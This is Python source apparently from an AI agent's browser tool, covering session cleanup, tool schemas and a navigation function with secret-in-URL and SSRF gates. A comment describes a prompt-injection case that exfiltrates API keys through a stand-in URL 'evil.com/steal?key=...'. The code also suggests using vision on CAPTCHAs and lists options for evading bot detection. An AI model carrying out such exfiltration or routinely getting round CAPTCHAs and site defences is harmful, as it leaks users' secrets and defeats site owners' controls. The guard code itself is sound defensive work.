            logger.info("Reaped orphaned browser daemon PID %d (session %s)",
                        daemon_pid, session_name)
            reaped += 1
        except (ProcessLookupError, PermissionError, OSError):
            pass

        # Clean up the socket directory
        shutil.rmtree(socket_dir, ignore_errors=True)

    if reaped:
        logger.info("Reaped %d orphaned browser session(s) from previous run(s)", reaped)


def _browser_cleanup_thread_worker():
    """
    Background thread that periodically cleans up inactive browser sessions.

    Runs every 30 seconds and checks for sessions that haven't been used
    within the BROWSER_SESSION_INACTIVITY_TIMEOUT period.
    On first run, also reaps orphaned sessions from previous process lifetimes.
    """
    # One-time orphan reap on startup
    try:
        _reap_orphaned_browser_sessions()
    except Exception as e:
        logger.warning("Orphan reap error: %s", e)

    # Loop until _stop_browser_cleanup_thread flips _cleanup_running off.
    while _cleanup_running:
        try:
            _cleanup_inactive_browser_sessions()
        except Exception as e:
            logger.warning("Cleanup thread error: %s", e)

        # Sleep in 1-second intervals so we can stop quickly if needed
        for _ in range(30):
            if not _cleanup_running:
                break
            time.sleep(1)


def _start_browser_cleanup_thread() -> None:
    """Start the background cleanup thread if not already running."""
    global _cleanup_thread, _cleanup_running

    with _cleanup_lock:
        # daemon=True so an otherwise-finished process isn't kept alive by
        # this thread; atexit still runs _stop_browser_cleanup_thread.
        if _cleanup_thread is None or not _cleanup_thread.is_alive():
            _cleanup_running = True
            _cleanup_thread = threading.Thread(
                target=_browser_cleanup_thread_worker,
                daemon=True,
                name="browser-cleanup"
            )
            _cleanup_thread.start()
            logger.info("Started inactivity cleanup thread (timeout: %ss)", BROWSER_SESSION_INACTIVITY_TIMEOUT)


def _stop_browser_cleanup_thread() -> None:
    """Stop the background cleanup thread.

    NOTE(review): reads ``_cleanup_thread`` without holding ``_cleanup_lock``
    — presumably safe because this only runs at process exit; confirm.
    """
    global _cleanup_running
    _cleanup_running = False
    if _cleanup_thread is not None:
        # Bounded join: the worker polls _cleanup_running every second.
        _cleanup_thread.join(timeout=5)


def _update_session_activity(task_id: str) -> None:
    """Update the last activity timestamp for a session."""
    with _cleanup_lock:
        _session_last_activity[task_id] = time.time()


# Register cleanup thread stop on exit
atexit.register(_stop_browser_cleanup_thread)


# ============================================================================
# Tool Schemas
# ============================================================================

# Declarations for each browser tool exposed to the agent: "name",
# human-readable "description", and "parameters" in JSON-Schema object form.
BROWSER_TOOL_SCHEMAS = [
    {
        "name": "browser_navigate",
        "description": "Navigate to a URL in the browser. Initializes the session and loads the page. Must be called before other browser tools. For simple information retrieval, prefer web_search or web_extract (faster, cheaper). For plain-text endpoints — URLs ending in .md, .txt, .json, .yaml, .yml, .csv, .xml, raw.githubusercontent.com, or any documented API endpoint — prefer curl via the terminal tool or web_extract; the browser stack is overkill and much slower for these. Use browser tools when you need to interact with a page (click, fill forms, dynamic content). Returns a compact page snapshot with interactive elements and ref IDs — no need to call browser_snapshot separately after navigating.",
        "parameters": {
            "type": "object",
            "properties": {
                "url": {
                    "type": "string",
                    "description": "The URL to navigate to (e.g., 'https://example.com')"
                }
            },
            "required": ["url"]
        }
    },
    {
        "name": "browser_snapshot",
        "description": "Get a text-based snapshot of the current page's accessibility tree. Returns interactive elements with ref IDs (like @e1, @e2) for browser_click and browser_type. full=false (default): compact view with interactive elements. full=true: complete page content. Snapshots over 8000 chars are truncated or LLM-summarized. Requires browser_navigate first. Note: browser_navigate already returns a compact snapshot — use this to refresh after interactions that change the page, or with full=true for complete content.",
        "parameters": {
            "type": "object",
            "properties": {
                "full": {
                    "type": "boolean",
                    "description": "If true, returns complete page content. If false (default), returns compact view with interactive elements only.",
                    "default": False
                }
            },
            "required": []
        }
    },
    {
        "name": "browser_click",
        "description": "Click on an element identified by its ref ID from the snapshot (e.g., '@e5'). The ref IDs are shown in square brackets in the snapshot output. Requires browser_navigate and browser_snapshot to be called first.",
        "parameters": {
            "type": "object",
            "properties": {
                "ref": {
                    "type": "string",
                    "description": "The element reference from the snapshot (e.g., '@e5', '@e12')"
                }
            },
            "required": ["ref"]
        }
    },
    {
        "name": "browser_type",
        "description": "Type text into an input field identified by its ref ID. Clears the field first, then types the new text. Requires browser_navigate and browser_snapshot to be called first.",
        "parameters": {
            "type": "object",
            "properties": {
                "ref": {
                    "type": "string",
                    "description": "The element reference from the snapshot (e.g., '@e3')"
                },
                "text": {
                    "type": "string",
                    "description": "The text to type into the field"
                }
            },
            "required": ["ref", "text"]
        }
    },
    {
        "name": "browser_scroll",
        "description": "Scroll the page in a direction. Use this to reveal more content that may be below or above the current viewport. Requires browser_navigate to be called first.",
        "parameters": {
            "type": "object",
            "properties": {
                "direction": {
                    "type": "string",
                    "enum": ["up", "down"],
                    "description": "Direction to scroll"
                }
            },
            "required": ["direction"]
        }
    },
    {
        "name": "browser_back",
        "description": "Navigate back to the previous page in browser history. Requires browser_navigate to be called first.",
        "parameters": {
            "type": "object",
            "properties": {},
            "required": []
        }
    },
    {
        "name": "browser_press",
        "description": "Press a keyboard key. Useful for submitting forms (Enter), navigating (Tab), or keyboard shortcuts. Requires browser_navigate to be called first.",
        "parameters": {
            "type": "object",
            "properties": {
                "key": {
                    "type": "string",
                    "description": "Key to press (e.g., 'Enter', 'Tab', 'Escape', 'ArrowDown')"
                }
            },
            "required": ["key"]
        }
    },
    {
        "name": "browser_get_images",
        "description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.",
        "parameters": {
            "type": "object",
            "properties": {},
            "required": []
        }
    },
    {
        "name": "browser_vision",
        "description": "Take a screenshot of the current page and analyze it with vision AI. Use this when you need to visually understand what's on the page - especially useful for CAPTCHAs, visual verification challenges, complex layouts, or when the text snapshot doesn't capture important visual information. Returns both the AI analysis and a screenshot_path that you can share with the user by including MEDIA:<screenshot_path> in your response. Requires browser_navigate to be called first.",
        "parameters": {
            "type": "object",
            "properties": {
                "question": {
                    "type": "string",
                    "description": "What you want to know about the page visually. Be specific about what you're looking for."
                },
                "annotate": {
                    "type": "boolean",
                    "default": False,
                    "description": "If true, overlay numbered [N] labels on interactive elements. Each [N] maps to ref @eN for subsequent browser commands. Useful for QA and spatial reasoning about page layout."
                }
            },
            "required": ["question"]
        }
    },
    {
        "name": "browser_console",
        "description": "Get browser console output and JavaScript errors from the current page. Returns console.log/warn/error/info messages and uncaught JS exceptions. Use this to detect silent JavaScript errors, failed API calls, and application warnings. Requires browser_navigate to be called first. When 'expression' is provided, evaluates JavaScript in the page context and returns the result — use this for DOM inspection, reading page state, or extracting data programmatically.",
        "parameters": {
            "type": "object",
            "properties": {
                "clear": {
                    "type": "boolean",
                    "default": False,
                    "description": "If true, clear the message buffers after reading"
                },
                "expression": {
                    "type": "string",
                    "description": "JavaScript expression to evaluate in the page context. Runs in the browser like DevTools console — full access to DOM, window, document. Return values are serialized to JSON. Example: 'document.title' or 'document.querySelectorAll(\"a\").length'"
                }
            },
            "required": []
        }
    },
]


# ============================================================================
# Utility Functions
# ============================================================================

def _create_local_session(task_id: str) -> Dict[str, str]:
    """Build session info for a local headless-Chromium session.

    No network call — just mints a unique ``h_<hex>`` session name that is
    later passed to agent-browser's ``--session`` flag.
    """
    import uuid
    session_name = f"h_{uuid.uuid4().hex[:10]}"
    logger.info("Created local browser session %s for task %s",
                session_name, task_id)
    return {
        "session_name": session_name,
        "bb_session_id": None,
        "cdp_url": None,
        "features": {"local": True},
    }


def _create_cdp_session(task_id: str, cdp_url: str) -> Dict[str, str]:
    """Create a session that connects to a user-supplied CDP endpoint."""
    import uuid
    session_name = f"cdp_{uuid.uuid4().hex[:10]}"
    logger.info("Created CDP browser session %s → %s for task %s",
                session_name, cdp_url, task_id)
    return {
        "session_name": session_name,
        "bb_session_id": None,
        "cdp_url": cdp_url,
        "features": {"cdp_override": True},
    }


def _get_session_info(task_id:
Optional[str] = None) -> Dict[str, str]:
    """
    Get or create session info for the given session key.

    In cloud mode, creates a Browserbase session with proxies enabled.
    In local mode, generates a session name for agent-browser --session.
    Also starts the inactivity cleanup thread and updates activity tracking.
    Thread-safe: multiple subagents can call this concurrently.

    Args:
        task_id: Session key. Normally the task_id as-is, but may carry the
            ``::local`` suffix for the hybrid-routing local sidecar — in that
            case the cloud provider is skipped even when one is configured,
            and a local Chromium session is created instead.

    Returns:
        Dict with session_name (always), bb_session_id + cdp_url (cloud only)
    """
    if task_id is None:
        task_id = "default"

    # Start the cleanup thread if not running (handles inactivity timeouts)
    _start_browser_cleanup_thread()

    # Update activity timestamp for this session
    _update_session_activity(task_id)

    with _cleanup_lock:
        # Check if we already have a session for this task
        if task_id in _active_sessions:
            return _active_sessions[task_id]

    # Hybrid routing: session keys ending with ``::local`` force a local
    # Chromium regardless of the globally-configured cloud provider. Public
    # URLs in the same conversation continue to use the cloud session under
    # the bare task_id key.
    force_local = _is_local_sidecar_key(task_id)

    # Create session outside the lock (network call in cloud mode)
    cdp_override = _get_cdp_override()
    if cdp_override and not force_local:
        session_info = _create_cdp_session(task_id, cdp_override)
    elif force_local:
        session_info = _create_local_session(task_id)
    else:
        provider = _get_cloud_provider()
        if provider is None:
            session_info = _create_local_session(task_id)
        else:
            try:
                session_info = provider.create_session(task_id)
                # Validate cloud provider returned a usable session
                if not session_info or not isinstance(session_info, dict):
                    raise ValueError(f"Cloud provider returned invalid session: {session_info!r}")
                if session_info.get("cdp_url"):
                    # Some cloud providers (including Browser-Use v3) return an HTTP
                    # CDP discovery URL instead of a raw websocket endpoint.
                    session_info = dict(session_info)
                    session_info["cdp_url"] = _resolve_cdp_override(str(session_info["cdp_url"]))
            except Exception as e:
                provider_name = type(provider).__name__
                logger.warning(
                    "Cloud provider %s failed (%s); attempting fallback to local "
                    "Chromium for task %s",
                    provider_name, e, task_id,
                    exc_info=True,
                )
                try:
                    session_info = _create_local_session(task_id)
                except Exception as local_error:
                    # Both paths failed — chain the original cloud error so
                    # the caller sees the full causal story.
                    raise RuntimeError(
                        f"Cloud provider {provider_name} failed ({e}) and local "
                        f"fallback also failed ({local_error})"
                    ) from e
                # Mark session as degraded for observability
                if isinstance(session_info, dict):
                    session_info = dict(session_info)
                    session_info["fallback_from_cloud"] = True
                    session_info["fallback_reason"] = str(e)
                    session_info["fallback_provider"] = provider_name

    with _cleanup_lock:
        # Double-check: another thread may have created a session while we
        # were doing the network call. Use the existing one to avoid leaking
        # orphan cloud sessions.
        if task_id in _active_sessions:
            return _active_sessions[task_id]
        _active_sessions[task_id] = session_info

    # Lazy-start the CDP supervisor now that the session exists (if the
    # backend surfaces a CDP URL via override or session_info["cdp_url"]).
    # Idempotent; swallows errors. See _ensure_cdp_supervisor for details.
    # Skip for local sidecars — they have no CDP URL.
    if not force_local:
        _ensure_cdp_supervisor(task_id)

    return session_info



def _find_agent_browser() -> str:
    """
    Find the agent-browser CLI executable.

    Checks in order: current PATH, Homebrew/common bin dirs, Hermes-managed
    node, local node_modules/.bin/, npx fallback.

    Returns:
        Path to agent-browser executable

    Raises:
        FileNotFoundError: If agent-browser is not installed
    """
    global _cached_agent_browser, _agent_browser_resolved
    # Fast path: a previous call already resolved (or definitively failed).
    if _agent_browser_resolved:
        if _cached_agent_browser is None:
            raise FileNotFoundError(
                "agent-browser CLI not found (cached). Install it with: "
                f"{_browser_install_hint()}\n"
                "Or run 'npm install' in the repo root to install locally.\n"
                "Or ensure npx is available in your PATH."
            )
        return _cached_agent_browser

    # Note: _agent_browser_resolved is set at each return site below
    # (not before the search) to prevent a race where a concurrent thread
    # sees resolved=True but _cached_agent_browser is still None.

    # Check if it's in PATH (global install)
    which_result = shutil.which("agent-browser")
    if which_result:
        _cached_agent_browser = which_result
        _agent_browser_resolved = True
        return which_result

    # Build an extended search PATH including Hermes-managed Node, macOS
    # versioned Homebrew installs, and fallback system dirs like Termux.
    # NOTE(review): "" base presumably means "fallback dirs only" — confirm
    # against _merge_browser_path's contract.
    extended_path = _merge_browser_path("")
    if extended_path:
        which_result = shutil.which("agent-browser", path=extended_path)
        if which_result:
            _cached_agent_browser = which_result
            _agent_browser_resolved = True
            return which_result

    # Check local node_modules/.bin/ (npm install in repo root)
    repo_root = Path(__file__).parent.parent
    local_bin = repo_root / "node_modules" / ".bin" / "agent-browser"
    if local_bin.exists():
        _cached_agent_browser = str(local_bin)
        _agent_browser_resolved = True
        return _cached_agent_browser

    # Check common npx locations (also search the extended fallback PATH)
    npx_path = shutil.which("npx")
    if not npx_path and extended_path:
        npx_path = shutil.which("npx", path=extended_path)
    if npx_path:
        # Sentinel value; _run_browser_command expands it to ["npx", "agent-browser"].
        _cached_agent_browser = "npx agent-browser"
        _agent_browser_resolved = True
        return _cached_agent_browser

    # Nothing found — cache the failure so subsequent calls don't re-scan.
    _agent_browser_resolved = True
    raise FileNotFoundError(
        "agent-browser CLI not found. Install it with: "
        f"{_browser_install_hint()}\n"
        "Or run 'npm install' in the repo root to install locally.\n"
        "Or ensure npx is available in your PATH."
    )


def _extract_screenshot_path_from_text(text: str) -> Optional[str]:
    """Extract a screenshot file path from agent-browser human-readable output.

    Tries progressively looser patterns: quoted "Screenshot saved to" path,
    unquoted form, then any absolute ``.png`` path in the text. Returns the
    first match, or None when nothing plausible is found.
    """
    if not text:
        return None

    patterns = [
        r"Screenshot saved to ['\"](?P<path>/[^'\"]+?\.png)['\"]",
        r"Screenshot saved to (?P<path>/\S+?\.png)(?:\s|$)",
        r"(?P<path>/\S+?\.png)(?:\s|$)",
    ]

    for pattern in patterns:
        match = re.search(pattern, text)
        if match:
            path = match.group("path").strip().strip("'\"")
            if path:
                return path

    return None


def _run_browser_command(
    task_id: str,
    command: str,
    args: Optional[List[str]] = None,
    timeout: Optional[int] = None,
) -> Dict[str, Any]:
    """
    Run an agent-browser CLI command using our pre-created Browserbase session.

    Args:
        task_id: Task identifier to get the right session
        command: The command to run (e.g., "open", "click")
        args: Additional arguments for the command
        timeout: Command timeout in seconds. ``None`` reads
            ``browser.command_timeout`` from config (default 30s).

    Returns:
        Parsed JSON response from agent-browser
    """
    if timeout is None:
        timeout = _get_command_timeout()
    args = args or []

    # Build the command
    try:
        browser_cmd = _find_agent_browser()
    except FileNotFoundError as e:
        logger.warning("agent-browser CLI not found: %s", e)
        return {"success": False, "error": str(e)}

    if _requires_real_termux_browser_install(browser_cmd):
        error = _termux_browser_install_error()
        logger.warning("browser command blocked on Termux: %s", error)
        return {"success": False, "error": error}

    # Local mode with no Chromium on disk: fail fast with an actionable
    # message instead of hanging for _command_timeout seconds per call.
    if _is_local_mode() and not _chromium_installed():
        if _running_in_docker():
            hint = (
                "Chromium browser is missing. You're running in Docker — pull "
                "the latest image to get the bundled Chromium: "
                "docker pull ghcr.io/nousresearch/hermes-agent:latest"
            )
        else:
            hint = (
                "Chromium browser is missing. Install it with: "
                "npx agent-browser install --with-deps "
                "(or: npx playwright install --with-deps chromium)"
            )
        logger.warning("browser command blocked: %s", hint)
        return {"success": False, "error": hint}

    from tools.interrupt import is_interrupted
    if is_interrupted():
        return {"success": False, "error": "Interrupted"}

    # Get session info (creates Browserbase session with proxies if needed)
    try:
        session_info = _get_session_info(task_id)
    except Exception as e:
        logger.warning("Failed to create browser session for task=%s: %s", task_id, e)
        return {"success": False, "error": f"Failed to create browser session: {str(e)}"}

    # Build the command with the appropriate backend flag.
    # Cloud mode: --cdp <websocket_url> connects to Browserbase.
    # Local mode: --session <name> launches a local headless Chromium.
    # The rest of the command (--json, command, args) is identical.
    if session_info.get("cdp_url"):
        # Cloud mode — connect to remote Browserbase browser via CDP
        # IMPORTANT: Do NOT use --session with --cdp. In agent-browser >=0.13,
        # --session creates a local browser instance and silently ignores --cdp.
        backend_args = ["--cdp", session_info["cdp_url"]]
    else:
        # Local mode — launch a headless Chromium instance
        backend_args = ["--session", session_info["session_name"]]

    # Keep concrete executable paths intact, even when they contain spaces.
    # Only the synthetic npx fallback needs to expand into multiple argv items.
    cmd_prefix = ["npx", "agent-browser"] if browser_cmd == "npx agent-browser" else [browser_cmd]

    cmd_parts = cmd_prefix + backend_args + [
        "--json",
        command
    ] + args

    try:
        # Give each task its own socket directory to prevent concurrency conflicts.
        # Without this, parallel workers fight over the same default socket path,
        # causing "Failed to create socket directory: Permission denied" errors.
        task_socket_dir = os.path.join(
            _socket_safe_tmpdir(),
            f"agent-browser-{session_info['session_name']}"
        )
        os.makedirs(task_socket_dir, mode=0o700, exist_ok=True)
        # Record this hermes PID as the session owner (cross-process safe
        # orphan detection — see _write_owner_pid).
        _write_owner_pid(task_socket_dir, session_info['session_name'])
        logger.debug("browser cmd=%s task=%s socket_dir=%s (%d chars)",
                     command, task_id, task_socket_dir, len(task_socket_dir))

        browser_env = {**os.environ}

        # Ensure subprocesses inherit the same browser-specific PATH fallbacks
        # used during CLI discovery.
        browser_env["PATH"] = _merge_browser_path(browser_env.get("PATH", ""))
        browser_env["AGENT_BROWSER_SOCKET_DIR"] = task_socket_dir

        # Tell the agent-browser daemon to self-terminate after being idle
        # for our configured inactivity timeout. This is the daemon-side
        # counterpart to our Python-side _cleanup_inactive_browser_sessions
        # — the daemon kills itself and its Chrome children when no CLI
        # commands arrive within the window. Added in agent-browser 0.24.
        if "AGENT_BROWSER_IDLE_TIMEOUT_MS" not in browser_env:
            idle_ms = str(BROWSER_SESSION_INACTIVITY_TIMEOUT * 1000)
            browser_env["AGENT_BROWSER_IDLE_TIMEOUT_MS"] = idle_ms

        # Inject --no-sandbox when needed (issue #15765):
        # - Running as root: Chromium always refuses to start without it
        # - Ubuntu 23.10+ / AppArmor systems: unprivileged user namespaces
        #   are restricted, causing Chromium to exit with "No usable sandbox"
        #   even for non-root users running under systemd or containers.
        if "AGENT_BROWSER_CHROME_FLAGS" not in browser_env:
            _needs_sandbox_bypass = False
            if hasattr(os, "geteuid") and os.geteuid() == 0:
                _needs_sandbox_bypass = True
                logger.debug("browser: running as root — injecting --no-sandbox")
            else:
                # Detect AppArmor user namespace restrictions (Ubuntu 23.10+)
                _userns_restrict = "/proc/sys/kernel/apparmor_restrict_unprivileged_userns"
                try:
                    with open(_userns_restrict) as _f:
                        if _f.read().strip() == "1":
                            _needs_sandbox_bypass = True
                            logger.debug(
                                "browser: AppArmor userns restrictions detected — "
                                "injecting --no-sandbox"
                            )
                except OSError:
                    pass
            if _needs_sandbox_bypass:
                browser_env["AGENT_BROWSER_CHROME_FLAGS"] = (
                    "--no-sandbox --disable-dev-shm-usage"
                )

        # Use temp files for stdout/stderr instead of pipes.
        # agent-browser starts a background daemon that inherits file
        # descriptors. With capture_output=True (pipes), the daemon keeps
        # the pipe fds open after the CLI exits, so communicate() never
        # sees EOF and blocks until the timeout fires.
        stdout_path = os.path.join(task_socket_dir, f"_stdout_{command}")
        stderr_path = os.path.join(task_socket_dir, f"_stderr_{command}")
        stdout_fd = os.open(stdout_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        stderr_fd = os.open(stderr_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        try:
            proc = subprocess.Popen(
                cmd_parts,
                stdout=stdout_fd,
                stderr=stderr_fd,
                stdin=subprocess.DEVNULL,
                env=browser_env,
            )
        finally:
            # The child holds its own copies of the fds; close ours either way.
            os.close(stdout_fd)
            os.close(stderr_fd)

        try:
            proc.wait(timeout=timeout)
        except subprocess.TimeoutExpired:
            proc.kill()
            proc.wait()
            logger.warning("browser '%s' timed out after %ds (task=%s, socket_dir=%s)",
                           command, timeout, task_id, task_socket_dir)
            return {"success": False, "error": f"Command timed out after {timeout} seconds"}

        with open(stdout_path, "r") as f:
            stdout = f.read()
        with open(stderr_path, "r") as f:
            stderr = f.read()
        returncode = proc.returncode

        # Clean up temp files (best-effort)
        for p in (stdout_path, stderr_path):
            try:
                os.unlink(p)
            except OSError:
                pass

        # Log stderr for diagnostics — use warning level on failure so it's visible
        if stderr and stderr.strip():
            level = logging.WARNING if returncode != 0 else logging.DEBUG
            logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500])

        stdout_text = stdout.strip()

        # Empty output with rc=0 is a broken state — treat as failure rather
        # than silently returning {"success": True, "data": {}}.
        # Some commands (close, record) legitimately return no output.
        if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS:
            logger.warning("browser '%s' returned empty output (rc=0)", command)
            return {"success": False, "error": f"Browser command '{command}' returned no output"}

        if stdout_text:
            try:
                parsed = json.loads(stdout_text)
                # Warn if snapshot came back empty (common sign of daemon/CDP issues)
                if command == "snapshot" and parsed.get("success"):
                    snap_data = parsed.get("data", {})
                    if not snap_data.get("snapshot") and not snap_data.get("refs"):
                        logger.warning("snapshot returned empty content. "
                                       "Possible stale daemon or CDP connection issue. "
                                       "returncode=%s", returncode)
                return parsed
            except json.JSONDecodeError:
                raw = stdout_text[:2000]
                logger.warning("browser '%s' returned non-JSON output (rc=%s): %s",
                               command, returncode, raw[:500])

                # Screenshot special case: the CLI sometimes prints a
                # human-readable "saved to" line instead of JSON; recover the
                # file path from the combined output if the file exists.
                if command == "screenshot":
                    stderr_text = (stderr or "").strip()
                    combined_text = "\n".join(
                        part for part in [stdout_text, stderr_text] if part
                    )
                    recovered_path = _extract_screenshot_path_from_text(combined_text)

                    if recovered_path and Path(recovered_path).exists():
                        logger.info(
                            "browser 'screenshot' recovered file from non-JSON output: %s",
                            recovered_path,
                        )
                        return {
                            "success": True,
                            "data": {
                                "path": recovered_path,
                                "raw": raw,
                            },
                        }

                return {
                    "success": False,
                    "error": f"Non-JSON output from agent-browser for '{command}': {raw}"
                }

        # Check for errors
        if returncode != 0:
            error_msg = stderr.strip() if stderr else f"Command failed with code {returncode}"
            logger.warning("browser '%s' failed (rc=%s): %s", command, returncode, error_msg[:300])
            return {"success": False, "error": error_msg}

        return {"success": True, "data": {}}

    except Exception as e:
        logger.warning("browser '%s' exception: %s", command, e,
exc_info=True) 1622 return {"success": False, "error": str(e)} 1623 1624 1625 def _extract_relevant_content( 1626 snapshot_text: str, 1627 user_task: Optional[str] = None 1628 ) -> str: 1629 """Use LLM to extract relevant content from a snapshot based on the user's task. 1630 1631 Falls back to simple truncation when no auxiliary text model is configured. 1632 """ 1633 if user_task: 1634 extraction_prompt = ( 1635 f"You are a content extractor for a browser automation agent.\n\n" 1636 f"The user's task is: {user_task}\n\n" 1637 f"Given the following page snapshot (accessibility tree representation), " 1638 f"extract and summarize the most relevant information for completing this task. Focus on:\n" 1639 f"1. Interactive elements (buttons, links, inputs) that might be needed\n" 1640 f"2. Text content relevant to the task (prices, descriptions, headings, important info)\n" 1641 f"3. Navigation structure if relevant\n\n" 1642 f"Keep ref IDs (like [ref=e5]) for interactive elements so the agent can use them.\n\n" 1643 f"Page Snapshot:\n{snapshot_text}\n\n" 1644 f"Provide a concise summary that preserves actionable information and relevant content." 1645 ) 1646 else: 1647 extraction_prompt = ( 1648 f"Summarize this page snapshot, preserving:\n" 1649 f"1. All interactive elements with their ref IDs (like [ref=e5])\n" 1650 f"2. Key text content and headings\n" 1651 f"3. Important information visible on the page\n\n" 1652 f"Page Snapshot:\n{snapshot_text}\n\n" 1653 f"Provide a concise summary focused on interactive elements and key content." 1654 ) 1655 1656 # Redact secrets from snapshot before sending to auxiliary LLM. 1657 # Without this, a page displaying env vars or API keys would leak 1658 # secrets to the extraction model before run_agent.py's general 1659 # redaction layer ever sees the tool result. 
1660 from agent.redact import redact_sensitive_text 1661 extraction_prompt = redact_sensitive_text(extraction_prompt) 1662 1663 try: 1664 call_kwargs = { 1665 "task": "web_extract", 1666 "messages": [{"role": "user", "content": extraction_prompt}], 1667 "max_tokens": 4000, 1668 "temperature": 0.1, 1669 } 1670 model = _get_extraction_model() 1671 if model: 1672 call_kwargs["model"] = model 1673 response = call_llm(**call_kwargs) 1674 extracted = (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text) 1675 # Redact any secrets the auxiliary LLM may have echoed back. 1676 return redact_sensitive_text(extracted) 1677 except Exception: 1678 return _truncate_snapshot(snapshot_text) 1679 1680 1681 def _truncate_snapshot(snapshot_text: str, max_chars: int = 8000) -> str: 1682 """Structure-aware truncation for snapshots. 1683 1684 Cuts at line boundaries so that accessibility tree elements are never 1685 split mid-line, and appends a note telling the agent how much was 1686 omitted. 1687 1688 Args: 1689 snapshot_text: The snapshot text to truncate 1690 max_chars: Maximum characters to keep 1691 1692 Returns: 1693 Truncated text with indicator if truncated 1694 """ 1695 if len(snapshot_text) <= max_chars: 1696 return snapshot_text 1697 1698 lines = snapshot_text.split('\n') 1699 result: list[str] = [] 1700 chars = 0 1701 for line in lines: 1702 if chars + len(line) + 1 > max_chars - 80: # reserve space for note 1703 break 1704 result.append(line) 1705 chars += len(line) + 1 1706 remaining = len(lines) - len(result) 1707 if remaining > 0: 1708 result.append(f'\n[... 
# ============================================================================
# Browser Tool Functions
# ============================================================================

def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
    """
    Navigate to a URL in the browser.

    Runs three safety gates IN ORDER before any navigation happens
    (secret-in-URL check, SSRF check, website policy check), then opens the
    URL in the session keyed by ``task_id``. On success the response also
    carries an auto-taken compact snapshot so the model can act without a
    separate browser_snapshot call.

    Args:
        url: The URL to navigate to
        task_id: Task identifier for session isolation

    Returns:
        JSON string with navigation result (includes stealth features info on first nav)
    """
    # Secret exfiltration protection — block URLs that embed API keys or
    # tokens in query parameters. A prompt injection could trick the agent
    # into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
    # Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...).
    import urllib.parse
    from agent.redact import _PREFIX_RE
    url_decoded = urllib.parse.unquote(url)
    if _PREFIX_RE.search(url) or _PREFIX_RE.search(url_decoded):
        return json.dumps({
            "success": False,
            "error": "Blocked: URL contains what appears to be an API key or token. "
                     "Secrets must not be sent in URLs.",
        })

    # SSRF protection — block private/internal addresses before navigating.
    # Skipped for local backends (Camofox, headless Chromium without a cloud
    # provider) because the agent already has full local network access via
    # the terminal tool. Also skipped when hybrid routing will auto-spawn a
    # local Chromium sidecar for this URL (cloud provider configured +
    # private URL + ``browser.auto_local_for_private_urls`` enabled) — the
    # cloud provider never sees the URL in that case. Can also be opted
    # out globally via ``browser.allow_private_urls`` in config.
    effective_task_id = task_id or "default"
    nav_session_key = _navigation_session_key(effective_task_id, url)
    auto_local_this_nav = _is_local_sidecar_key(nav_session_key)

    if (
        not _is_local_backend()
        and not auto_local_this_nav
        and not _allow_private_urls()
        and not _is_safe_url(url)
    ):
        return json.dumps({
            "success": False,
            "error": "Blocked: URL targets a private or internal address",
        })

    # Website policy check — block before navigating
    blocked = check_website_access(url)
    if blocked:
        return json.dumps({
            "success": False,
            "error": blocked["message"],
            "blocked_by_policy": {"host": blocked["host"], "rule": blocked["rule"], "source": blocked["source"]},
        })

    # Camofox backend — delegate after safety checks pass
    if _is_camofox_mode():
        from tools.browser_camofox import camofox_navigate
        return camofox_navigate(url, task_id)

    if auto_local_this_nav:
        logger.info(
            "browser_navigate: auto-routing %s to local Chromium sidecar "
            "(cloud provider %s stays on cloud for public URLs; "
            "set browser.auto_local_for_private_urls: false to disable)",
            url,
            type(_get_cloud_provider()).__name__ if _get_cloud_provider() else "none",
        )

    # Get session info to check if this is a new session
    # (will create one with features logged if not exists)
    session_info = _get_session_info(nav_session_key)
    is_first_nav = session_info.get("_first_nav", True)

    # Auto-start recording if configured and this is first navigation
    if is_first_nav:
        session_info["_first_nav"] = False
        _maybe_start_recording(nav_session_key)

    # Page loads need more headroom than ordinary commands, so the
    # navigation timeout is floored at 60 seconds.
    result = _run_browser_command(nav_session_key, "open", [url], timeout=max(_get_command_timeout(), 60))

    # Remember which session served this nav so snapshot/click/fill/...
    # on the same task_id hit it (critical when hybrid routing has both a
    # cloud session and a local sidecar alive concurrently).
    _last_active_session_key[effective_task_id] = nav_session_key

    if result.get("success"):
        data = result.get("data", {})
        title = data.get("title", "")
        final_url = data.get("url", url)

        # Post-redirect SSRF check — if the browser followed a redirect to a
        # private/internal address, block the result so the model can't read
        # internal content via subsequent browser_snapshot calls.
        # Skipped for local backends (same rationale as the pre-nav check),
        # and for the hybrid local sidecar (we're already on a local browser
        # hitting a private URL by design).
        if (
            not _is_local_backend()
            and not auto_local_this_nav
            and not _allow_private_urls()
            and final_url and final_url != url and not _is_safe_url(final_url)
        ):
            # Navigate away to a blank page to prevent snapshot leaks
            _run_browser_command(nav_session_key, "open", ["about:blank"], timeout=10)
            return json.dumps({
                "success": False,
                "error": "Blocked: redirect landed on a private/internal address",
            })

        response = {
            "success": True,
            "url": final_url,
            "title": title
        }

        # Detect common "blocked" page patterns from title/url
        blocked_patterns = [
            "access denied", "access to this page has been denied",
            "blocked", "bot detected", "verification required",
            "please verify", "are you a robot", "captcha",
            "cloudflare", "ddos protection", "checking your browser",
            "just a moment", "attention required"
        ]
        title_lower = title.lower()

        if any(pattern in title_lower for pattern in blocked_patterns):
            response["bot_detection_warning"] = (
                f"Page title '{title}' suggests bot detection. The site may have blocked this request. "
                "Options: 1) Try adding delays between actions, 2) Access different pages first, "
                "3) Enable advanced stealth (BROWSERBASE_ADVANCED_STEALTH=true, requires Scale plan), "
                "4) Some sites have very aggressive bot detection that may be unavoidable."
            )

        # Include feature info on first navigation so model knows what's active
        if is_first_nav and "features" in session_info:
            features = session_info["features"]
            active_features = [k for k, v in features.items() if v]
            if not features.get("proxies"):
                response["stealth_warning"] = (
                    "Running WITHOUT residential proxies. Bot detection may be more aggressive. "
                    "Consider upgrading Browserbase plan for proxy support."
                )
            response["stealth_features"] = active_features

        # Auto-take a compact snapshot so the model can act immediately
        # without a separate browser_snapshot call.
        try:
            snap_result = _run_browser_command(nav_session_key, "snapshot", ["-c"])
            if snap_result.get("success"):
                snap_data = snap_result.get("data", {})
                snapshot_text = snap_data.get("snapshot", "")
                refs = snap_data.get("refs", {})
